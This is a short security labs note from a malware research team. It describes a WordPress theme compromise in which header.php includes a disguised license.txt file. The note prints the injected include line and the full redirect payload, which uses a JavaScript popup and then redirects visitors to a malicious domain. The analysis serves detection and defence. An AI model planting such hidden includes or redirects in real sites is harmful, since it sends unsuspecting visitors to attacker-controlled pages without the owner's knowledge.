Fake License.txt File Loaded Through PHP Include

  • April 3, 2020
Labs Note

Our team recently found a malicious injection located within a PHP include. The redirect occurs via the include function, which includes a file inconspicuously named license.txt.

During our investigation, we located the license.txt injected within header.php of the WordPress theme file.

include('license.txt'); ?>
        </header> <!-- #main-header -->
    <?php
        $main_header = ob_get_clean();

        /**
         * Filters the HTML output for the main header.
         *
         * @since ??
         *
         * @param string $main_header
         */
        echo apply_filters( 'et_html_main_header', $main_header );
    ?>
        <div id="et-main-area">
    <?php
        /**
         * Fires after the header, before the main content is output.
         *
         * @since ??
         */
        do_action( 'et_before_main_content' );

The license.txt file is essentially a redirect to send site visitors to a malicious domain, which uses HTML to generate a redirect to the malicious website https://times2day[.]com, and was registered on February 6th, 2020.

<?php
<html>
<meta http-equiv="X-UA-Compatible"
content="IE-Edge">
   <meta name="viewport" content="width=device-width,
initial scale=1">
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>
   <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
   </script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js">
    </script>
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
</head>
<body>
<script>
swal({
    title: 'Oh, you must be visiting us!!!! ',
    text: 'Getting access..... ',
    icon: 'success',
    timer: 2000,
    buttons: false,
})
.then(() => {
    window.location.href = "https://times2day.com/";
})
</script>
</body>
</html>

?>

To detect these types of malicious injections, site owners can scan websites for known malware, blacklisting status, website errors, out-of-date software, and malicious code.

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like